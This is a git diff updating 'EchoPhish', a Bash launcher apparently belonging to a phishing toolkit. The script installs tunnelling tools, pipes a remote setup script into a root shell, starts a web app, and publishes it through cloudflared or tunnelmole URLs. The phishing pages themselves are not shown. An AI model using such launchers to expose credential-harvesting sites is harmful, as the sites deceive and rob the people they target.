Update version 2.1

diff --git a/EchoPhish b/EchoPhish
--- a/EchoPhish
+++ b/EchoPhish
@@ -4,29 +4,36 @@ RED='\033[1;31m'
 GREEN='\033[1;32m'
 YELLOW='\033[1;33m'
 CYAN='\033[1;36m'
+BLUE='\033[0;34m'
+BOLD='\033[1m'
 RESET='\033[0m'
 
 cleanup() {
     if pgrep -f "cloudflared" > /dev/null; then
         killall cloudflared
-        echo -e "${YELLOW}Cloudflared stopped.${RESET}"
+        echo -e "\n${YELLOW} [ ! ] Cloudflared stopped.${RESET}\n"
     fi
+
     if pgrep -f "tunnelmole" > /dev/null || pgrep -f "tmole" > /dev/null || pgrep -f "x-www-browser" > /dev/null; then
         pkill -f "tunnelmole"
         pkill -f "tmole"
         pkill -f "x-www-browser"
-        echo -e "${YELLOW}Tunnelmole stopped.${RESET}"
+        echo -e "\n${YELLOW} [ ! ] Tunnelmole stopped.${RESET}\n"
     fi
-    if pgrep -f "python3 web_app.py" > /dev/null; then
-        pkill -f "python3 web_app.py"
-        echo -e "${YELLOW}Web application stopped.${RESET}"
+
+    if pgrep -f "gunicorn" > /dev/null; then
+        pkill -f "gunicorn"
+        echo -e "\n${YELLOW} [ ! ] Web application (gunicorn) stopped.${RESET}\n"
+        sleep 1
     fi
+
     exit 0
 }
 
+
 trap cleanup SIGINT
 
-banner1() {
+banner() {
     echo -e "${CYAN} _____                                                     _____ "
     echo -e "( ___ )                                                   ( ___ )"
     echo -e " |   |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|   | "
@@ -38,24 +45,55 @@ banner1() {
     echo -e " |   | |______\\___|_| |_|\\___/  |_|    |_| |_|_|___/_| |_| |   | "
     echo -e " |___|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|___| "
     echo -e "(_____)                                                   (_____)${RESET}${YELLOW}"
-    echo -e "           https://t.me/AzerbaijanTermux        V2.0\n"
+    echo -e "           https://t.me/AzerbaijanTermux        V2.1\n"
     echo -e "${RED}    "
 }
 
+
+cloudflared_install() {
+    if [ -d "/data/data/com.termux" ]; then
+        clear
+        banner
+        echo -e "\n${YELLOW} [ + ] Termux environment detected! Installing Cloudflared for Termux...${RESET}\n"
+        
+        export TERMUX_PREFIX=~/../usr/
+        wget https://github.com/cloudflare/cloudflared/archive/refs/tags/2025.1.0.tar.gz
+        tar -xvzf 2025.1.0.tar.gz
+        cd cloudflared-2025.1.0 || exit 1
+        pkg install -y golang
+        go build -v -ldflags "-X \"main.Version=2025.1.0\" -X \"main.BuildTime=$(date -u '+%Y.%m.%d-%H:%M UTC')\"" ./cmd/cloudflared
+        install -Dm700 -t "$TERMUX_PREFIX/bin" cloudflared
+        rm 2025.1.0.tar.gz *
+        rm -rf ./cloudflared
+        clear
+        banner
+        echo -e "${GREEN} [ + ] Cloudflared 2025.1.0 has been successfully installed!${RESET}"
+        echo -e "${BLUE} [ + ] Installation directory: ${BOLD}$TERMUX_PREFIX/bin${RESET}"
+    
+    else
+        clear
+        banner
+        echo -e "\n${YELLOW} [ + ] Standard Linux environment detected! Installing Cloudflared for Linux...${RESET}\n"
+        
+        sudo wget -O /usr/local/bin/cloudflared https://github.com/cloudflare/cloudflared/releases/download/2025.1.0/cloudflared-linux-amd64
+        sudo chmod +x /usr/local/bin/cloudflared
+
+        clear
+        banner
+        echo -e "${GREEN} [ + ] Cloudflared has been successfully installed!${RESET}"
+        echo -e "${BLUE} [ + ] Installation directory: ${BOLD}/usr/local/bin/cloudflared${RESET}"
+    fi
+}
+
+
+
 check_dependencies() {
-    if ! command -v cloudflared &> /dev/null || ! cloudflared --version 2>&1 | grep -q 'permission denied'; then
-        echo -e "${YELLOW}Cloudflared is not installed. Installing...${RESET}"
-        if [ -d "/data/data/com.termux" ]; then
-            pkg update -y && pkg install -y cloudflared
-        else
-            wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -O /usr/local/bin/cloudflared
-        fi
-        chmod +x ${PREFIX:-/usr/local/bin}/cloudflared
-        echo -e "${GREEN}Cloudflared installed successfully.${RESET}"
+    if ! cloudflared --version 2>/dev/null | grep -q '2025.1.0'; then
+        cloudflared_install
     fi
 
     if ! command -v node &> /dev/null; then
-        echo -e "${YELLOW}Node.js is not installed. Installing...${RESET}"
+        echo -e "${RED} [ ! ] Node.js is not installed. Installing...${RESET}"
         
         if [ -d "/data/data/com.termux" ]; then
             pkg update -y && pkg install -y nodejs
@@ -63,28 +101,28 @@ check_dependencies() {
             curl -fsSL https://deb.nodesource.com/setup_16.x | sudo -E bash -
             sudo apt-get install -y nodejs
         fi
-        echo -e "${GREEN}Node.js installed successfully.${RESET}"
+        echo -e "${GREEN} [ + ] Node.js installed successfully.${RESET}"
     fi
 
     if ! command -v tunnelmole &> /dev/null; then
-        echo -e "${YELLOW}Tunnelmole is not installed. Installing...${RESET}"
+        echo -e "${RED} [ ! ] Tunnelmole is not installed. Installing...${RESET}"
         
         if [ -d "/data/data/com.termux" ]; then
             npm install -g tunnelmole
         else
             sudo npm install -g tunnelmole
         fi
-        echo -e "${GREEN}Tunnelmole installed successfully.${RESET}"
+        echo -e "${GREEN} [ + ] Tunnelmole installed successfully.${RESET}"
     fi
 
     if ! command -v jq &> /dev/null; then
-        echo -e "${YELLOW}jq is not installed. Installing...${RESET}"
+        echo -e "${RED} [ ! ] jq is not installed. Installing...${RESET}"
         if [ -d "/data/data/com.termux" ]; then
             pkg update -y && pkg install -y jq
         else
             sudo apt-get update -y && sudo apt-get install -y jq
         fi
-        echo -e "${GREEN}jq installed successfully.${RESET}"
+        echo -e "${GREEN} [ + ] jq installed successfully.${RESET}"
     fi
 }
 
@@ -92,7 +130,7 @@ check_dependencies
 
 select_methode () {
     clear
-    banner1
+    banner
 
     echo -e "\n${YELLOW}    Select the method!"
     echo -e "----------------------"
@@ -100,33 +138,56 @@ select_methode () {
     echo -e "----------------------"
     echo -e "|   2-${GREEN} cloudflared${YELLOW}     |"
     echo -e "----------------------"
-    echo -e "|   3-${GREEN} tunnelmole${YELLOW}      | (Recommended for Termux)"
-    echo -e "----------------------"
+    echo -e "|   3-${GREEN} tunnelmole${YELLOW}      |"
+    echo -e "----------------------\n"
 
-    read -p "Choose: " choose
+    while true; do
+        echo -e -n "${YELLOW} [ ? ] Choose: "
+        read choose
+        
+        if [[ "$choose" =~ ^[1-3]$ ]]; then
+            break  
+        else
+            echo -e "${RED} [ ! ] Please enter a valid number (1-3)!${RESET}"
+        fi
+    done
+
+    while true; do
+        echo -e -n "${YELLOW} [ ? ] Enter the port to use (default 8080): "
+        read port
+        port=${port:-8080}  
+
+        if [[ "$port" =~ ^[0-9]+$ ]] && [ "$port" -ge 1 ] && [ "$port" -le 65535 ]; then
+            break  
+        else
+            echo -e "${RED} [ ! ] Invalid port number. Please enter a valid port (1-65535).${RESET}"
+        fi
+    done  
 
     clear
-    banner1
+    banner
 
     case $choose in
         1)
-            python3 web_app.py &
+            echo -e "${GREEN} [ + ] Starting the application on port $port ...${RESET}"
+            gunicorn --bind 0.0.0.0:$port web_app:app 2>/dev/null &  
             sleep 2
             clear
-            banner1
-            echo -e "${YELLOW} \nURLs: "
+            banner
+            echo -e "\n${YELLOW} URLs: "
             echo -e "------------------------------------------------"
-            echo -e "${GREEN}-URL:\nhttp://127.0.0.1:8080${YELLOW}"
+            echo -e "${GREEN} [ + ] http://127.0.0.1:$port${YELLOW}"
             echo -e "------------------------------------------------"
             ;;
 
         2)
-            python3 web_app.py &
+            echo -e "${GREEN} [ + ] Starting the application on port $port ...${RESET}"
+            gunicorn --bind 0.0.0.0:$port web_app:app 2>/dev/null &  
             sleep 2
-            cloudflared tunnel --no-autoupdate --metrics localhost:55555 --url http://localhost:8080 2>/dev/null & 
+            cloudflared tunnel --no-autoupdate --metrics localhost:55555 --url http://localhost:$port 2>/dev/null & 
             clear
-            banner1
-            echo -e "${YELLOW}Cloudflared starting...."
+            banner
+            echo -e "${GREEN} [ + ] Cloudflared starting...."
 
             result=""
             while [[ -z "$result" || "$result" == "null" ]]; do
@@ -135,31 +196,34 @@ select_methode () {
             done
 
             clear
-            banner1
+            banner
             echo -e "${YELLOW} \nURLs: "
             echo -e "------------------------------------------------"
-            echo -e "${GREEN}https://${result}${YELLOW}"
+            echo -e "${GREEN} [ + ] https://${result}${YELLOW}"
             echo -e "------------------------------------------------"
             ;;
 
         3)
-            python3 web_app.py &
+            echo -e "${GREEN} [ + ] Starting the application on port $port ...${RESET}"
+            gunicorn --bind 0.0.0.0:$port web_app:app 2>/dev/null &  
             sleep 2
             clear
-            banner1
-            echo -e "${YELLOW}Tunnelmole starting....${GREEN}\n"
-            tunnelmole 8080 
+            banner
+            echo -e "${GREEN} [ + ] Starting Tunnelmole on port $port...${RESET}"
+            tunnelmole $port 
             sleep 2
             ;;
 
         *)
-            echo -e "${RED}Please enter a valid number!${RESET}"
+            echo -e "${RED} [ ! ] Please enter a valid number!${RESET}"
             sleep 1
             select_methode  
             ;;
 
     esac
 }
+
+
 
 select_methode
 
